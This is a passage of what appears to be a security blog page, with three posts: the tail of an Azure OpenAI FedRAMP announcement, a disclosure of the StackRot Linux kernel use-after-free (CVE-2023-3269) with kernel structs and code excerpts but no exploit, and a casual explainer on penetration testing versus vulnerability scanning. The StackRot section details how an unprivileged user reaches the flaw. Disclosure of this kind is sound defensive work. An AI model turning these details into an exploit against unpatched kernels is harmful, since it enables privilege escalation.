providers. The authorization allows government users and developers to incorporate Azure OpenAI’s foundation models, such as GPT-4, GPT-3.5, and DALL-E, into their cloud applications. The service offers high-performance AI models on a production scale with unparalleled uptime. The Azure OpenAI service fosters a myriad of use cases to aid government users in supporting their unique missions, including capabilities to: Expedite content generation: Automatically produce responses based on mission or project inquiries, reducing research and analysis effort, and enabling teams to concentrate on higher-level decision-making and strategic tasks. Simplify content summarization: Generate succinct summaries of logs and facilitate quick analysis of articles, analysts, and field reports. Enhance Semantic search optimization: Refine the accuracy of search results by comprehending the intent behind a user's query. Provide Code generation and rectification: Produce code from natural language descriptions or rectify errors in existing code. For secure access to Azure OpenAI Service by government tenants, we have formulated a detailed guide on establishing secure connectivity between government and commercial tenants utilizing Azure’s robust backbone. The FedRAMP High authorization underscores our relentless commitment to ensure government agencies can access state-of-the-art AI technologies while adhering to stringent security and compliance requisites. We eagerly anticipate empowering federal agencies to transform their mission-critical operations with Azure OpenAI and unlock new insights powered by Generative AI. References Microsoft Azure AI P-ATO post Microsoft launches generative AI service for government agencies

  • StackRot (CVE-2023-3269) - Exploit Will Be Released Soon!

    Vulnerability StackRot (CVE-2023-3269) is a privilege escalation vulnerability in the Linux kernel. This disclosure complies with the linux-distros list policy and aims to provide early information about the vulnerability. While the essential details of the vu lnerability are included here, a complete exploit code and comprehensive write-up will be publicly available by the end of July. The GitHub repository will be updated, and the oss-security thread will be notified accordingly. The vulnerability, known as StackRot or "Stack Rot," affects the handling of stack expansion in Linux kernel versions 6.1 through 6.4. The issue arises in the maple tree, responsible for managing virtual memory areas. During node replacement, the MM write lock is not properly acquired, resulting in use-after-free problems. An unprivileged local user can exploit this flaw to compromise the kernel and elevate their privileges. StackRot impacts nearly all kernel configurations as it is a vulnerability within the memory management subsystem of the Linux kernel. Triggering the vulnerability requires minimal capabilities. However, it is important to note that maple nodes are freed using RCU callbacks, which delay memory deallocation until after the RCU grace period. Consequently, exploiting this vulnerability is considered challenging. To the best of current knowledge, there are no publicly available exploits targeting use-after-free-by-RCU (UAFBR) bugs. This is the first known instance where UAFBR bugs have been proven to be exploitable, even without the presence of CONFIG_PREEMPT or CONFIG_SLAB_MERGE_DEFAULT settings. Note: The StackRot vulnerability has existed in the Linux kernel since version 6.1 when the VMA tree structure transitioned from red-black trees to maple trees. Maple Tree The maple tree is a range-based B-tree designed to utilize modern processor cache efficiently while ensuring RCU (Read-Copy-Update) safety. Its implementation offers various benefits in the Linux kernel, particularly in areas where a non-overlapping range-based tree with a straightforward interface would be advantageous. If you currently use an rbtree in conjunction with other data structures to enhance performance or an interval tree to track non-overlapping ranges, the maple tree is a suitable alternative. The tree exhibits a branching factor of 10 for non-leaf nodes and 16 for leaf nodes. Compared to the rbtree, the maple tree has a significantly shorter height, resulting in fewer cache misses. Furthermore, the elimination of the linked list between consecutive entries reduces cache misses and the necessity to fetch the previous and next VMA (Virtual Memory Area) during various tree modifications. The initial focus of this patch set is to apply the maple tree as a replacement for three data structures in the vm_area_struct. These structures include the augmented rbtree, the vma cache, and the linked list of VMAs in the mm_struct. The ultimate objective is to reduce or eliminate contention on the mmap_lock. The plan is to transition using the maple tree in RCU mode, where readers will not block writers. Only one write operation will be permitted at a time, and if stale data is encountered, a reader will re-traverse the tree. RCU will be enabled for VMAs, and this mode will be activated once multiple tasks are utilizing the mm_struct. Issue - StackRot (CVE-2023-3269) When the mmap() system call is utilized to establish a memory mapping in the Linux kernel, a specialized data structure called vm_area_struct is generated to represent the corresponding virtual memory area (VMA). This VMA structure plays a crucial role as a container, housing a wide range of information such as flags, properties, and other pertinent details that are directly associated with the specific memory mapping operation. struct vm_area_struct { long unsigned int vm_start; /* 0 8 */ long unsigned int vm_end; /* 8 8 */ struct mm_struct * vm_mm; /* 16 8 */ pgprot_t vm_page_prot; /* 24 8 */ long unsigned int vm_flags; /* 32 8 */ union { struct { struct rb_node rb __attribute__((__aligned__(8))); /* 40 24 */ /* --- cacheline 1 boundary (64 bytes) --- */ long unsigned int rb_subtree_last; /* 64 8 */ } __attribute__((__aligned__(8))) shared __attribute__((__aligned__(8))); /* 40 32 */ struct anon_vma_name * anon_name; /* 40 8 */ } __attribute__((__aligned__(8))); /* 40 32 */ /* --- cacheline 1 boundary (64 bytes) was 8 bytes ago --- */ struct list_head anon_vma_chain; /* 72 16 */ struct anon_vma * anon_vma; /* 88 8 */ const struct vm_operations_struct * vm_ops; /* 96 8 */ long unsigned int vm_pgoff; /* 104 8 */ struct file * vm_file; /* 112 8 */ void * vm_private_data; /* 120 8 */ /* --- cacheline 2 boundary (128 bytes) --- */ atomic_long_t swap_readahead_info; /* 128 8 */ struct vm_userfaultfd_ctx vm_userfaultfd_ctx; /* 136 0 */ /* size: 136, cachelines: 3, members: 14 */ /* forced alignments: 1 */ /* last cacheline: 8 bytes */ } __attribute__((__aligned__(8))); In order to efficiently handle page faults and other memory-related system calls, the Linux kernel requires rapid lookup of the virtual memory area (VMA) based solely on the address. Traditionally, VMA management relied on red-black trees. However, starting from Linux kernel version 6.1, the transition was made to maple trees. Maple trees are RCU-safe B-tree data structures specifically optimized for storing non-overlapping ranges. Conversely, the introduction of maple trees added complexity to the codebase and introduced the StackRot vulnerability. The maple tree structure consists of maple nodes. For the purposes of this discussion, we will assume that the maple tree has a single root node, which can accommodate a maximum of 16 intervals. Each interval can represent either a gap or point to a specific VMA. Consequently, it is not possible to have gaps between two intervals within the tree. struct maple_range_64 { struct maple_pnode * parent; /* 0 8 */ long unsigned int pivot[15]; /* 8 120 */ /* --- cacheline 2 boundary (128 bytes) --- */ union { void * slot[16]; /* 128 128 */ struct { void * pad[15]; /* 128 120 */ /* --- cacheline 3 boundary (192 bytes) was 56 bytes ago --- */ struct maple_metadata meta; /* 248 2 */ }; /* 128 128 */ }; /* 128 128 */ /* size: 256, cachelines: 4, members: 3 */ }; The data structure maple_range_64 is employed to represent a node within the maple tree implementation. This structure is defined as follows: it contains pivots, which denote the boundaries of 16 intervals, and slots, which serve as references to the VMA (Virtual Memory Area) structure when the node is considered a leaf node. The maple tree introduces certain restrictions for concurrent modification, imposing the requirement of an exclusive lock for writers. In the case of the VMA tree, this exclusive lock corresponds to the MM write lock. As for readers, two options are available to them. The first option involves holding the MM read lock, which results in writers being blocked by the MM read-write lock. The second option is to enter the RCU critical section, allowing writers to proceed without being blocked, while readers can continue their operations due to the RCU-safe nature of the maple tree. While most existing VMA accesses typically choose the first option, the second option is employed in a few performance-critical scenarios, such as lockless page faults. Though, there is an additional aspect that requires careful consideration, particularly regarding stack expansion. The stack represents a memory area that is mapped with the MAP_GROWSDOWN flag, indicating automatic expansion when an address below the region is accessed. In such cases, adjustments are made to the start address of the corresponding VMA and the associated interval within the maple tree. Notably, these adjustments are performed without holding the MM write lock. static inline void do_user_addr_fault(struct pt_regs *regs, unsigned long error_code, unsigned long address) { // ... if (unlikely(!mmap_read_trylock(mm))) { // ... } // ... if (unlikely(expand_stack(vma, address))) { // ... } // ... } In the Linux kernel, a stack guard is typically enforced to create a gap between the stack Virtual Memory Area (VMA) and its adjacent VMA. When expanding the stack, the pivot value in the maple node can be updated atomically, given the presence of this gap. However, if the neighboring VMA also has the MAP_GROWSDOWN flag, there is no stack guard enforced, and the stack expansion can eliminate the existing gap. In such cases, it becomes necessary to remove the interval within the maple node corresponding to the gap. int expand_downwards(struct vm_area_struct *vma, unsigned long address) { // ... if (prev) { if (!(prev->vm_flags & VM_GROWSDOWN) && vma_is_accessible(prev) && (address - prev->vm_end < stack_guard_gap)) return -ENOMEM; } // ... } Since the maple tree implementation in the kernel is RCU-safe, it is not possible to overwrite the existing node in-place. Instead, a new node is created, which triggers node replacement. Subsequently, the old node is destroyed using an RCU callback mechanism. This ensures the safe and efficient handling of node updates within the maple tree data structure. The problem occurs with the invocation of the RCU (Read-Copy-Update) callback, which occurs only after all pre-existing RCU critical sections have completed. However, when accessing Virtual Memory Areas (VMAs), the MM (Memory Management) read lock is the only lock held, and it does not enter the RCU critical section. This creates a potential issue where the RCU callback could be invoked at any time, potentially leading to the freeing of the old maple node. However, pointers to the old node may have already been obtained, resulting in a use-after-free bug when subsequent access is attempted. The following backtrace depicts the specific location where the use-after-free (UAF) occurs: Remediation On June 15th, I responsibly reported this vulnerability to the Linux kernel security team. Linus Torvalds led the process of addressing the bug, considering its complexity. It took nearly two weeks to develop a series of patches that received consensus and were deemed suitable for resolving the issue. On June 28th, during the merge window for Linux kernel 6.5, the fix was successfully incorporated into Linus' tree. Linus provided a detailed merge message, offering technical insights into the patch series and its implementation. Following the merge, these patches were backported to stable kernels, specifically versions 6.1.37, 6.3.11, and 6.4.1. This backporting process ensured that the "Stack Rot" bug was effectively addressed and resolved on July 1st. References Fix was merged into Linus' tree: The updated 6.1.y, 6.3.y and 6.4.y git trees can be found at:;a=summary Git: git:// linux-6.1.y git:// linux-6.3.y git:// linux-6.4.y Credit @lrh2000 - Ruihan Li @sochotnicky - Stanislav Ochotnický

  • Penetration testing vs vulnerability scanning

    The dynamic pair of cybersecurity techniques is Penetration testing vs vulnerability scanning Ah, the age-old battle of penetration testing vs vulnerability scanning! It's like choosing between a stealthy ninja and a tech-savvy wizard to safeguard your precious business assets. Hold on, though, since these two have different responsibilities in the field of cybersecurity and are more than willing to work together to take down some cyber-bad guys. Penetration Testing or "PenTest" Services The agile and brave penetration test is our first contender. Imagine a skilled hacker in a white hat unleashing their inner bad guy to examine your systems for any potential vulnerabilities. But don't worry, it's all for security; they aren't trying to cause trouble! These reputable experts, referred to as pentesters, simulate genuine cyberattacks without inflicting any harm. They act as digital detectives on a quest to identify weaknesses and fix them before the actual bad guys have a chance to take advantage of them. Now, you might be wondering why so many companies choose to contract out penetration testing. Well, for starters, an outsider gives new perspectives and unbiased eyes. Additionally, hiring full-time, specialized security personnel can be as challenging as solving a Rubik's cube while wearing blinders. It's like having a superhero squad on fast dial to outsource your security needs to knowledgeable professionals that regularly conduct risk assessments and pen tests! The problem is that penetration testing cannot just unwind with a bowl of popcorn. They aren't couch potatoes; they only engage in hands-on activity! While they do employ certain handy security technologies, they are unable to fully automate their magic. They use manual tools for testing and vulnerability assessment, such as Metasploit, and they even experiment with the fine art of social engineering, which includes a little phishing. Hey, do whatever it takes to determine how security-savvy your personnel is! Vulnerability Scanning On the other hand, vulnerability scanning acts as your dependable automatic companion, constantly ready to intervene and keep things under control. It is like to having a vigilant security robot scour your network for known problems and possible dangers. For routine checks throughout the software development lifecycle, this tool-driven method works perfectly. Finding those recurring issues and shooing them away before they become serious issues is the key. Of course, not every vulnerability scanner is the same; some are simple signature-based sniffers, while others go as far as automated penetration testing. Consider them tech-savvy daredevils who try assaults like their pentesting brethren. But keep in mind that they protect against a distinct range of vulnerabilities—those that automation cannot find on its own. It's as if they had X-ray vision to penetrate your software's layers and reveal undiscovered bugs! How frequently should we have parties for these heroes? Like an all-access card to a VIP party, vulnerability assessments are welcome whenever and whenever they are conducted. There are no restrictions on how frequently they may be executed, so you can schedule them whenever is necessary. Just be aware of their resource-hungry nature and provide them some love during the off-peak hours for producing resources. On the other side, penetration testing are like the main performers at a prestigious gala. They take up a lot of time, money, and resources, so having them available all the time is not viable. Instead, a few award-winning performances annually or at key moments will keep your defenses honed and ready at all times. But hey, don't let the animosity between these two champs get the better of you. Like peanut butter and jelly, they go together well and even provide you extra alternatives to up your security game. Rewards, anyone? Freelance ethical hackers can participate in the game and try to get past your defenses in exchange for a reward, such as a digital camera. Hunt for treasure! But keep in mind that bounties are like the icing on the cake—a welcome addition but not a replacement for routine penetration tests. But in Addition, How Does "Threat Modeling Unravel Cyber Mysteries for Penetration Testers" Ah, threat modeling—a phrase that gives the uninformed shivers down their spines. Do not worry, though, for it is not as enigmatic as it seems! Imagine yourself as a detective, hunting out any potential threat that may hurt a company, a target network, or a tasty in-scope application. By outlining these dangers to direct our nefarious actions during a penetration test, penetration testers function as builders of chaos. Oh, and we also utilize this information, like seasoned cybersecurity soothsayers, to rank the dangers related to found vulnerabilities! Threat modeling may now be as informal as a mental checklist used in the preliminary phases of an assessment or as formal as a methodology that is outlined in writing and used by companies to make wise decisions. But regardless of the style, it's a dance that we must perform. When we communicate the findings with our stakeholders, it offers context to the vulnerabilities and exploits we find throughout our sly activities, making the outcomes more palpable and plausible. We can use the following questions from Wikipedia to aid in our investigation: Where am I most at risk of being attacked? What dangers are most important? What must I do to protect myself from these dangers? To find the answers to these questions is to solve an exciting cybercrime. It's a procedure that may help an organization better recognize risk so they can implement preventative measures and controls like a digital fortification! We don't merely hack into networks or steal sensitive data and call it a day when we go out on our penetration testing expeditions. Oh no, our clients have given us very precise objectives. Our goal is to quickly locate all potential vulnerabilities, exploit them, and determine the real scope of the hazards they entail. No quick routes for capture-the-flag here! Threat modeling plays a key role in helping us understand the hazards that are ready to pounce on unaware victims before we can appropriately estimate risks. Like the hackers in the movies, we intrepid penetration testers aim to imitate genuine attackers in order to expose the real threats to our targets. Our whole testing approach is based on an understanding of the dangers a target application faces. It's like discovering the contents of a carefully guarded cyber-treasure trove! Conclusion, The End, Finito! So there you have it, vulnerability scanning and penetration testing, the dynamic pair of cybersecurity. They collaborate well, protecting your digital castle and making sure those annoying cybercriminals never have a chance. So let them collaborate, play to their strengths, and turn your company into an unstoppable force online! You now know about the fascinating area of threat modeling and how important it is to our evaluations. It is weaved throughout every task we carry out and is a crucial component of our trade. In fact, many businesses may already be doing it without even recognizing it! Please get in touch if you have any questions regarding this cyber-sleuthing procedure or how it relates to our penetration testing experiences. We're always up for engaging online conversation!

bottom of page